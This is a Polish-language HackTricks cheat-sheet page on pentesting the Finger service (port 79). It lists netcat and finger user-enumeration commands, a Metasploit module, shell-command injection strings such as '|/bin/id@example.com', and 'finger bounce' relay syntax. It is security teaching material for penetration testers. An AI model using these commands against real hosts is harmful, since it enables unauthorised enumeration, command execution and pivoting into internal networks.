79 - Pentesting Finger
Reading time: 2 minutes
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
Podstawowe informacje
Program/usługa Finger jest wykorzystywana do uzyskiwania szczegółów o użytkownikach komputerów. Zazwyczaj dostarczane informacje obejmują nazwę logowania użytkownika, pełne imię i nazwisko, a w niektórych przypadkach dodatkowe szczegóły. Te dodatkowe informacje mogą obejmować lokalizację biura i numer telefonu (jeśli dostępne), czas, kiedy użytkownik się zalogował, okres bezczynności (czas bezczynności), ostatni moment, w którym użytkownik przeczytał wiadomość e-mail, oraz zawartość plików planów i projektów użytkownika.
Domyślny port: 79
PORT STATE SERVICE
79/tcp open finger
Enumeracja
Zbieranie banerów/Podstawowe połączenie
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Enumaracja użytkowników
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternatywnie możesz użyć finger-user-enum z pentestmonkey, kilka przykładów:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap wykonuje skrypt przy użyciu domyślnych skryptów
Metasploit używa więcej sztuczek niż Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Wykonanie polecenia
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Użyj systemu jako przekaźnika finger
finger user@host@victim
finger @internal@external
tip
Ucz się i ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegram lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.